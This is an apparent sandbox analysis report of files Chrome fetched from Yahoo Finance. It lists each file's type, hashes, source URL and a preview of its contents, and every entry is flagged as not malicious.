                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.428172874886598
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:+pxyiYGAdU1sahkgF58HF+XZky13RekzWkb99QuKjk:0yFUickgnsF+pky13RHXMRjk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:39D7FEA8EE427CFF64304A5288CB61F8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9855642C4D93C0C5F23BB896B0A22ECB13E2FBEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FA85A4366200F608A99ECF4B1B933BABDD9C5662CBE5D518B3DAA57E53DBD85B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FD66459E82D8CE7A8903899CCC3B92E350195DBB530E4967877DF5F3557CE385666769C4E9AB71E87BA135347B928542160075A5C54706E6E71E6B46D85DF4FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! VelocityJS.org (1.2.2). (C) 2014 Julian Shapiro. MIT @license: en.wikipedia.org/wiki/MIT_License */./*! VelocityJS.org jQuery Shim (1.0.1). (C) 2014 The jQuery Foundation. MIT @license: en.wikipedia.org/wiki/MIT_License. */.!function(e){function t(e){var t=e.length,r=$.type(e);return"function"===r||$.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===r||0===t||"number"==typeof t&&t>0&&t-1 in e}if(!e.jQuery){var $=function(e,t){return new $.fn.init(e,t)};$.isWindow=function(e){return null!=e&&e==e.window},$.type=function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?a[o.call(e)]||"object":typeof e},$.isArray=Array.isArray||function(e){return"array"===$.type(e)},$.isPlainObject=function(e){var t;if(!e||"object"!==$.type(e)||e.nodeType||$.isWindow(e))return!1;try{if(e.constructor&&!n.call(e,"constructor")&&!n.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}for(t in e);return void 0===t||n.call(e,t)},$.each=function(e,r,a){var n,o=0,i=e.length,s=t(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.920124022111301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:FP1NT5JCKHY1uVmtdBPkfLEsd+UPpMcD8l8r38Si9sHo+jcaFjGlGSFZA:p1NLCUYwEbI4s4UPOsrDisHrjcmhSFZA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:06E0C3EC10D958937F87B3172C3F56DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B07BDF939FB18DD42367E7D41616E89D693B9FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9C3B3A0755AA9A46F3CD0C58F2C64B4AAFEDBFB290AA9E52B2C80FF42F1D0778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9F8DC498551D529371394C49EA6B150A7562D4701EC857E852CDE52E1C6D89F42322B4614BBF3A038378EF08360B1C7CE6228BDC42D8F8A57254D3A2CE7C83D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/uUAR2bOq_t6VJz1nT5AULg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_sports_articles_558/4a196f0fdaa67a9fca3ea52c340239cd.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF.*..WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 v(...a...*....>y8.I$.**.q.qP..ek..P......P..*vs...*..x.)..^....Yc.t......y...r[...)...e[...E......X}I......,C.>.W.."Z&.I.Ft .p.rW.....x..$.k-5.!..........K...O.............t.I.o..F\t...7...N)MZT0$/.+...L.......U..8.D..*M...g=.*".....{.z..(..).y..m..\..20...L.."..Y.....V..l3...^...............DJ......0v.K.~.(....., ..7h.Z..&..$.-.%~._...2..".B..l.m.{.,.{p;Y}.7..B.(;.c.B....Q..2s.jS.J(P.....~.}....GIMW.1..k...`
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.909438443382918
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:qnvrhn8Deky9O/BC7859s3arCsaEuTt+MrKww53JN:qvqDVaOFA3KC+uLKwMJN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4D2129EDCAB36EEF56472FC0719F060D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8D4CC3A58F850836073D77E424084930DF190BC0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2321853E5577C07EAD56589F86DDD16ED5E4B2192A9CEA627F7AE723591EE84D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5008B2AF8071B6CA23CEC3630E8D98FA79CDA82BCE38B5C35916F3A8BBC84F320ED5E5B55BF68E767EF813D6B04CECFA5B258407EC4F1304385CECD48E4F5F74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/3717.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq...) =8,=..*...t_...E0E6&A;4J..+/&;!.3ZHC9-?0';;0@3)>2'94*=;/?#.6IBV1';</=3);0(?3)=L?G5,DE8E0';K9@$.67-E:/DA:OL:F.%;UCP6*;LE[7,;6+@3':A5E,$=.&:6,=C<T;.<6-D...+#;.........................B....CPL\..PNIZ...SO^.....+.AQK]........Q.......E/&>...............O.H,$<lhwVP`............e^q........ELHX6-I.......<........J{v.+#:3+F/'A..........@pkz......_Zj..0d\o..UbZm......vq.]Yg... .2..S,#?..8..M...&.9....B.6.....:....9...d_n.K......!.5hdr........ibuWRdjeurn|...".4.R...(.9......ZVd.........|..............................D=Q....................f^r......gas....B.M.}.A.........^.......xt....KGV...............H..........z.2*B.........W.[....r.a.=.........@a\k.....SN_ZTf.h........1......91F..................Q.v..Exr..a.5...7tRNS...............w.d..l...Y...!.6.%....+.......?...I....._.....IDATX..wX.Y.. $4uUD.,.....kr7d"!.&.R.!..@..@.*E@4.DD.h@.,...""RD.c.....X.....KB..qw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2300)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.325021030225331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:adOJa/nJA+8CjMIwzVJh+BF8y3lJUE8+bP7dMcKbPoyomZV3SNN:adOJa/Jnp2zvh+BFZPUEpbhMX7o1mm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3989DA7F7944D63A430A5A819E50740D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D4D387D315136BE458764BCD9BE3FFABA1A157E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CAD27531D30FD25BFB54AA6E2A44144BECBE7F2FAD0BD5477B6D57BD708D9FCD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B7C13010DEB2ED1C0D30EAB9AFD31008E8944B6680DEDD0887627DF600FED38CD7676D7B5FDA7B65FCAE0D0DF808500D9C90E98E3B47F794C1FF7E4FF8702301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Change.CEp_qEmJ.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as v,p as g,k as h,n as s,i as o,A as w,e as q,t as V,d as C,f as E,h as S,B as k,l as A,M as H}from"./scheduler.Dr9AAxFe.js";import{g as M}from"./spread.CgU5AtxT.js";import{S as N,i as R}from"./index.DCSmZEjO.js";function B(i){const e=i.slice(),t=e[4]||{};return e[10]=t.fmt!==void 0?t.fmt:"-",e[11]=t.raw!==void 0?t.raw:"-",e}function y(i){let e,t=i[10]+"",_,u,n,a,d=[{"data-test":"change"},{"data-symbol":i[3]},{"data-field":u=i[1].id},{"data-trend":"none"},{"data-pricehint":n=i[0].original.priceHint},{"data-value":a=i[11]},i[2]?{active:""}:{}],f={};for(let l=0;l<d.length;l+=1)f=w(f,d[l]);return{c(){e=q("fin-streamer"),_=V(t),this.h()},l(l){e=C(l,"FIN-STREAMER",{"data-test":!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-pricehint":!0,"data-value":!0});var c=E(e);_=S(c,t),c.forEach(o),this.h()},h(){k(e,f)},m(l,c){h(l,e,c),A(e,_)},p(l,c){c&16&&t!==(t=l[10]+"")&&H(_,t,f.contenteditable),k(e,f=M(d,[{"data-test":"change"},c&8&&{"data-symbol":l[3]},c&2&&u!==(u=l[1].id)&&{"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.794012564216353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:4cQjYXIj4GsRvUXX6C8Vk2GeW7/cQjiIj44BRBMobREMzYjYXIj45H+v:4FYYo1fC8Vk2GeUF/lRBMoFzYYYAH+v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:81D3B105C6FBC54877D499666E4B175E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:74B7CC5CFD44CABDD19DA2DF4F52BB40388CDDE2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16FB1199ED43717F4F43ACC0F7954F6172B3FCB204679DFBF218582C8CA90881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:87962B71C0051C77D735CBD70D9CCF3075218A0236BC108FE2977DDEB2F07067EABF027E99384D871D060E81F195B7E1FEDECA90DF8F06B90CC62741584F67B1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/NoContent.Dkv6jm1i.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.no-content.yf-32mzn4.yf-32mzn4{min-height:10em;display:flex;flex-direction:column;align-items:center;justify-content:center}.no-content.yf-32mzn4 p.yf-32mzn4{max-width:50ch;color:var(--text2);line-height:1.6;font-size:var(--font-m)}.no-content.left.yf-32mzn4.yf-32mzn4{align-items:start}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8254), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.339222492199265
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:6EuL8zG7CAQyinBudEIrfp4CrxdHtxVhyQRyfTSTvTsTyT2Y3mkot:juL8uCByinBxmB4CrxtTHySyfWDYOyY8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1ED4FE71B1FC647DDBF37A7050944309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7D959D812262C51C4C11D7D31BE040692248F438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FAF50015DE5B96281DCBF145FDF58222EFC35C962759A3E915F4E95F510D7B78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7E1332BF492D83256CD7E6507811FA188D3D1F23659B4697C15563254B77E8184CF3E23064D5E9DFD4A22229DAD02EA300FE57CF4E77C4093D8F29C6B1DFD0EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/fp/js/react-wafer-stream.custom.modern.1ed4fe71b1fc647ddbf37a7050944309.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.wafer&&window.wafer.ready((function(){var e="show-drawer",t=null,a=null,r="wafer-fetch-error",i="wafer-fetch-complete",n="stream-related-drawer",o="StreamRelated",s="react-wafer-stream",c="json",d="wafer-fetch",l="stream-uuid-list",u=[],w=document.querySelectorAll(".stream-items"),m=window.innerWidth||document.documentElement.clientWidth,f="js-sponsored-moments-dwell-time",A=window.wafer&&window.wafer.utils,g={INARTICLE:9/16,reservemoments:16/9},p=function e(t){var a,r,i=t.getAttribute("data-da-position");if("reservemoments"===i&&(t=t.querySelector("#defaultRESERVEMOMENTS")),a=t.getAttribute("data-html"),r=t.getAttribute("data-darla-config"),a&&r){(r=JSON.parse(r)).dest;var n=window.DARLA.prefetched();if(!window.DARLA.config()||window.DARLA.inProgress()||n&&0!==n.length)setTimeout((function(){e(t)}),500);else{if(!r.h&&!r.w){var o=Math.floor(m*g[i]),s={flex:{h:{min:o},w:{min:m}},h:o,w:m};Object.assign(r,s)}var c=r.id;window.DARLA.addPos(r);var d=new window.DARLA.Response(c,{});a=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1234)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.299437297247461
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:ovMMsfsx7aH1R2efLNhuVlF2OhdkGuAJst5/E+14Xy+cyFbUwOh7:ovAfqmH1Pfzc2YCGhGnvsx/bC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:44D0FA4C983B5244CE40D4AA2005DCDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BCA6C8F85F1DCD0D681A274CC2BE5E9BBBCDE879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:445F983469DC46178F96B47212255C92E1E5FAA7953A2A61084B98FD9A5585D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1AB6256798E5D402CEBBFF4FFF71F3D6A5BC95388F368ED77503255196E7CB1E05B558674D423C05A362F3CC92F029BFBA573A9A56BAC95BC6DDC6C256A0F63C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Ads.Bxzxpy-0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as u}from"./scheduler.Dr9AAxFe.js";import{S as r,i as _,c as g,b as v,m as w,t as I,a as N,d as T}from"./index.DCSmZEjO.js";import{A}from"./AdGroup.CD4BTzLP.js";function h(o){let a,n;return a=new A({props:{ids:o[5],dataTestId:o[2],device:o[1],className:o[0],load:o[3],overflow:o[4]}}),{c(){g(a.$$.fragment)},l(e){v(a.$$.fragment,e)},m(e,i){w(a,e,i),n=!0},p(e,[i]){const s={};i&32&&(s.ids=e[5]),i&4&&(s.dataTestId=e[2]),i&2&&(s.device=e[1]),i&1&&(s.className=e[0]),i&8&&(s.load=e[3]),i&16&&(s.overflow=e[4]),a.$set(s)},i(e){n||(I(a.$$.fragment,e),n=!0)},o(e){N(a.$$.fragment,e),n=!1},d(e){T(a,e)}}}function S(o,a,n){let e,{className:i=""}=a,{position:s}=a,{id:d=void 0}=a,{device:f="all"}=a,{dataTestId:l="ad-container"}=a,{load:m="onmount"}=a,{overflow:c=!1}=a;return o.$$set=t=>{"className"in t&&n(0,i=t.className),"position"in t&&n(6,s=t.position),"id"in t&&n(7,d=t.id),"device"in t&&n(1,f=t.device),"dataTestId"in t&&n(2,l=t.dataTestId),"load"in t&&n(3,m=t.load),"overflow"in t&&n(4,c=t.o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.293055408241309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:qqYhfIy1QDghAgtzE4NAtnIZESKxSEoFYEsstzkRWtTazMfjIDo4djfccaPIfqLC:rmIy1gnlXsEtxSRs5RWtXaO9QwNAkqsO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CF5E56879AEB634BE2D265576AD25939
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:823F3EC135A623DA7DFC43BDA502328022C2247E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:07A8B3BAC87EF5E3A78ED99295266C18332FA772F59CE89B4DAF763734D617CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E48B32C88D46F58016C500928E1040A9F6C061E5DF261F6623B347CEDFDA5721FEDD4D21D9293B541884D40C43AF830ACA8D655C559DEE4D65C979AE739A9A6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{f as o,l as d}from"./logUtil.hOue7iAU.js";import{d as f}from"./commonUtil.CI22_Irn.js";import{l as y}from"./loadQuote.D9BAmXuK.js";async function m(r,{count:l=15,silent:n=!1,reuse:s=!1}){const[i]=await f(["recentlyViewedTickers"],r),t=i.getRecentlyViewedTickers();if(s&&(t!=null&&t.length))return t;try{const a=await o(r,{isRelative:!0,pathname:"/xhr/recently-viewed-tickers",perfLabel:"loadRecentlyViewedTickers",query:{}}),e=(a==null?void 0:a.slice(0,l))||[];if(e&&e.length>0)try{await y(r,{fields:["longName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","shortName","priceHint"],symbols:e})}catch{}return n||i.updateRecentlyViewedTickers(e),e}catch(c){d(r,{},{data:c,perfLabel:"loadRecentlyViewedTickers"})}}export{m as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (21224)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.349731623672621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:PLX1wtH+NTv0vDckjUhzU0ZppJeiUGg2TD7eC43YU/Us3ZYNbHG3W5AJdME9oPaV:jKtPQOaG3WFaoPaIK/zn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F1DFC75C82E12DFE846D5593978E422A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:12E580A708B09C9A8F4CA7CCBE9DD7DF32EDEE60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:08204982C484FAF6890C60557A4E642971F17625DDDDC0559DC0E3CA728AC9E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:623412E6D454104251215E38A0F365F879EC70F77306769F5FA40E144C0EAB43237D1FE13B92031AD5848071A6A8910F01576F079E1A0904F4D8DD8959D922A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}},ea=function(a){return a.raw=a},fa="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};da("Object.assign",f
